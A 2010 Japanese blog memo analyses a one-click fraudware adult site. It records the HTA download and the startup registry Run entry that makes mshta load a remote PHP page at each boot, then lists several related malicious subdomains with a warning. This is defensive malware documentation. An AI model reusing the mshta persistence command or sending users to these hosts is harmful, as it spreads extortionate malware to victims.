ワンクリウェアサイト備忘録

ワンクリウェアをダウンロードさせるサイトの検証 おもに(Windows Vista)で検証しています。

Adult rapid share 「bc.ars.0manko.jp」

2010年07月16日 19時24分47秒 | 日記
ダウンロードファイル「movie.hta」

C:\Windows\system32\mshta.exe
O4 - HKCU\..\Run: [system_boot_cec02acc8fd4fc4ce7d136b83283dfac] C:\Windows\system32\mshta http://bc.ars.0manko.jp/reg2.php?cid=cec02acc8fd4fc4ce7d136b83283dfac


「mshta.exe」が実行。


スタートアップの記述



他にもありますw
警告: これらのURLにアクセスし動画ファイルをダウンロードするとワンクリウェア( malicious software )すなわち悪意あるソフトウェアに感染するおそれがあります。

http://gold03.ars.0manko.jp/
http://support.ars.0manko.jp/
http://maroon71.ars.0manko.jp/
http://99.ars.0manko.jp
http://sliver37.ars.0manko.jp/
http://biue25.ars.0manko.jp/


それぞれスタートアップレジストリの記述が異なって
いるかも知れません。
ジャンル:
ウイルス
キーワード
レジストリ ワンクリウェア
トラックバック (0) |  この記事についてブログを書く
Messenger この記事をはてなブックマークに追加 mixiチェック シェア
« 変態クラブ「adul... | トップ | ADULT MONKEY 「w... »

コメント

コメントはありません。

コメントを投稿

現在、コメントを受け取らないよう設定されております。
※ブログ管理者のみ、編集画面で設定の変更が可能です。

トラックバック

この記事のトラックバック  Ping-URL
ブログ作成者から承認されるまでトラックバックは反映されません。
  • 送信元の記事内容が半角英数のみのトラックバックは受け取らないよう設定されております。
  • ※ブログ管理者のみ、編集画面で設定の変更が可能です。

あわせて読む